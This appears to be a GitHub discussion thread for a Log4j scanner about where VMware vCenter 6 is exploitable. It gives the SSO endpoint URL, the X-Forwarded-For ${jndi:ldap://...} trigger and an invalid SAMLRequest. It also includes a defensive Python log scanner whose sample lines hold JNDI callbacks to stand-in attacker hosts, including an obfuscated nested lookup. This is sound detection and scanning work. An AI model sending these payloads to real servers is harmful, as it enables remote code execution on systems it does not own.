[Discussion]: Right parameters to check VMware VCenter 6 Log4j vulnerability #65
Comments
The vCenter web UI root URL is not affected directly. To trigger the bug, you have to hit the SSO endpoint (which is logged in sso.log on the vCenter server). Specifically, your request must include the X-Forwarded-For header with the ${jndi:ldap://xxx} string and pass an invalid SAMLRequest variable. vCenter's SSO module will then log whatever value is in the X-Forwarded-For header to the sso.log file because of the bad SAMLRequest variable in the query string, and trigger the exploit. You should scan the following URL: https://hostname of vcenter/websso/SAML2/SSO/vsphere.local?SAMLRequest=garbage_gets_logged
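One defender-side way to act on the point above, as an added example that is not from the thread or the scanner project: sweep sso.log lines for the JNDI lookup string the comment says gets written there via X-Forwarded-For. The log line format and the sample lines are constructed assumptions, and the check also flags nested ${...} lookups, which goes beyond the plain form mentioned in the thread.

```python
import re

# Constructed sample lines in the style of vCenter's sso.log. The exact line
# format is an assumption for this example; real appliances log differently.
SAMPLE_SSO_LOG = """\
2021-12-16T06:39:21Z INFO  SsoRequest client=203.0.113.5 SAMLRequest=garbage_gets_logged X-Forwarded-For=${jndi:ldap://198.51.100.77:389/a}
2021-12-16T06:40:02Z INFO  SsoRequest client=198.51.100.9 SAMLRequest=valid-base64 X-Forwarded-For=198.51.100.9
2021-12-16T06:41:13Z INFO  SsoRequest client=203.0.113.7 SAMLRequest=bad X-Forwarded-For=${${lower:j}ndi:rmi://203.0.113.99:1099/x}
"""

# A plain ${jndi:...} lookup, case-insensitive.
PLAIN_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# A nested lookup such as ${${lower:j}ndi:...}: Log4j resolves the inner
# ${...} first, so it evaluates to the same lookup while evading a naive
# string match. Any nested lookup inside a client-supplied header is anomalous.
NESTED_LOOKUP = re.compile(r"\$\{[^}]*\$\{")
# Destination scheme of the lookup, if one is present in the line.
SCHEME = re.compile(r"(ldaps?|rmi|dns|iiop|corba|nds|http)://", re.IGNORECASE)


def find_jndi_lookups(log_text: str) -> list[dict]:
    """Return one record per log line that carries a JNDI lookup string."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        if PLAIN_JNDI.search(line):
            kind = "plain"
        elif NESTED_LOOKUP.search(line):
            kind = "obfuscated"
        else:
            continue
        client = re.search(r"client=(\S+)", line)
        scheme = SCHEME.search(line)
        hits.append({
            "line": lineno,
            "kind": kind,
            "client": client.group(1) if client else None,
            "scheme": scheme.group(1).lower() if scheme else None,
        })
    return hits


if __name__ == "__main__":
    for hit in find_jndi_lookups(SAMPLE_SSO_LOG):
        print(hit)
```

Point it at a real sso.log (or a syslog feed of it) to find which source addresses probed the SSO endpoint and which callback scheme they used.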
Very helpful, thank you! It is difficult to know the exact URL of the services that are affected. Already scanned many sites with reverse proxies and different services behind. What about Elasticsearch or Nextcloud? {'timestamp': '2021-12-16T06:39:21.991765586Z', 'host': '1.2.3.4fga8ah845t485e845ab584fda845re485485ba84r545ae845b485are484rb85.interact.sh', 'remote_address': '5.6.7.8'}
Let's keep this open for discussion. An excellent idea is to maintain a KB of exploitation PoCs for products, similar to @matthoskins1980's explanation :)
Is there any news on it? Is there someone who has a KB of exploitation PoCs?
Questions over questions: you must know the exact URL pattern where log4j acts for every service. Tried to scan an affected UniFi Network Controller. Tried many things; don't know how I should find out what to scan exactly.
Hi,
this script doesn't work with a VMware vCenter 6 destination server.
I've tested it inside the LAN but it always returns the message "No vulnerable destination".
Was this script tested with the VMware vCenter appliance?
Thank you 👋🏻